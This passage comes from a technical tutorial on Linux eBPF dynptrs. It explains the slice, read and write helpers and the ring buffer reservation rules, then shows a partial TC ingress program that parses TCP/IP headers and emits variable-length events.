&lt;p&gt;Ring buffer operations use &lt;code&gt;bpf_ringbuf_reserve_dynptr()&lt;/code&gt; to allocate variable-length records. Unlike regular &lt;code&gt;bpf_ringbuf_reserve()&lt;/code&gt; which returns a pointer to a fixed-size region, the dynptr variant lets you specify the size at runtime. This is crucial for variable-length event structures.&lt;/p&gt;

&lt;h3&gt;
  
  
  Reading and Writing
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;bpf_dynptr_read()&lt;/code&gt; helper copies data from a dynptr into a destination buffer. It takes an offset and length, performing runtime bounds checking and returning an error if the read would exceed the dynptr's bounds. This is the safe way to extract data when you need it in a local buffer.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;bpf_dynptr_write()&lt;/code&gt; helper does the reverse, copying data into a dynptr. For skb dynptrs, writing may have additional semantics similar to &lt;code&gt;bpf_skb_store_bytes()&lt;/code&gt;, and note that writes can invalidate previously obtained slices.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;bpf_dynptr_data()&lt;/code&gt; helper returns a direct pointer to data within the dynptr, with the verifier tracking the bounds statically. However, this does NOT work for skb or xdp dynptrs since their data may not be in a single contiguous region.&lt;/p&gt;

&lt;h3&gt;
  
  
  Slicing for Packet Parsing
&lt;/h3&gt;

&lt;p&gt;For skb and xdp dynptrs, &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; is the primary way to access data. You provide an offset, a length, and optionally a local buffer. The function returns a pointer to the requested data, which may be either a direct pointer into the packet or your provided buffer (if the data needed to be copied from non-linear regions).&lt;/p&gt;

&lt;p&gt;The critical rule is that &lt;strong&gt;you must NULL-check the return value&lt;/strong&gt;. A NULL return means the requested region cannot be accessed, either because it exceeds packet bounds or for other internal reasons. Once you have a valid slice pointer, you can dereference it safely within the requested bounds.&lt;/p&gt;

&lt;p&gt;There's also &lt;code&gt;bpf_dynptr_slice_rdwr()&lt;/code&gt; for obtaining writable slices, with availability depending on the program type and whether the underlying data supports writes.&lt;/p&gt;

&lt;h3&gt;
  
  
  Ring Buffer Lifecycle
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;bpf_ringbuf_reserve_dynptr()&lt;/code&gt; function has special lifecycle rules enforced by the verifier. Once you call it, you &lt;strong&gt;must&lt;/strong&gt; call either &lt;code&gt;bpf_ringbuf_submit_dynptr()&lt;/code&gt; or &lt;code&gt;bpf_ringbuf_discard_dynptr()&lt;/code&gt; on the dynptr, regardless of whether the reservation succeeded. This is not optional since the verifier tracks dynptr state and will reject programs that leak reserved dynptrs.&lt;/p&gt;

&lt;p&gt;This differs from regular ringbuf usage where a NULL return from &lt;code&gt;bpf_ringbuf_reserve()&lt;/code&gt; means nothing was allocated. With dynptrs, the reserve failure still requires explicit cleanup through discard. The verifier needs this guarantee to ensure proper resource management.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: TC Ingress with Dynptr Parsing and Variable-Length Events
&lt;/h2&gt;

&lt;p&gt;Our demonstration program attaches to TC ingress and accomplishes three things. First, it creates an skb dynptr from incoming packets using &lt;code&gt;bpf_dynptr_from_skb()&lt;/code&gt;. Second, it parses Ethernet, IPv4, and TCP headers using &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; for safe bounds-checked access. Third, it outputs variable-length events through a ringbuf dynptr, including a configurable snapshot of TCP payload.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: dynptr_tc.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_endian.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"dynptr_tc.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cm"&gt;/* kfunc declarations for dynptr operations (v6.4+) */&lt;/span&gt;
&lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_from_skb&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;__sk_buff&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;flags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                               &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ptr__uninit&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;__ksym&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;offset&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                              &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buffer__opt&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;buffer__sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;__ksym&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* 16MB */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;events&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_cfg&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;cfg_map&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tc"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;dynptr_tc_ingress&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;__sk_buff&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_cfg&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Temporary buffers for slice (data may be copied here) */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ethhdr&lt;/span&gt; &lt;span class="n"&gt;eth_buf&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;iphdr&lt;/span&gt;  &lt;span class="n"&gt;ip_buf&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;tcphdr&lt;/span&gt; &lt;span class="n"&gt;tcp_buf&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ethhdr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;iphdr&lt;/span&gt;  &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;tcphdr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;cfg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;cfg_map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create dynptr from skb */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_dynptr_from_skb&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse Ethernet header using slice */&lt;/span&gt;
    &lt;span class="n"&gt;eth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;eth_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;eth_buf&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;h_proto&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;bpf_htons&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ETH_P_IP&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse IPv4 header */&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;ip_off&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;eth&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;iph&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ip_off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ip_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ip_buf&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;iph&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;version&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;protocol&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;IPPROTO_TCP&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse TCP header */&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;tcp_off&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ip_off&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ihl&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;tcp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr_slice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tcp_off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tcp_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tcp_buf&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ntohs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;dest&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;sport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ntohs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;source&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__u8&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="cm"&gt;/* Output variable-length event using ringbuf dynptr */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;__u8&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_SNAPLEN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;

        &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;payload_off&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;tcp_off&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;doff&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload_off&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;avail&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;payload_off&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;avail&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;avail&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;MAX_SNAPLEN&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;MAX_SNAPLEN&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_dynptr_read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;skb_ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;payload_off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event_hdr&lt;/span&gt; &lt;span class="n"&gt;hdr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ts_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pkt_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
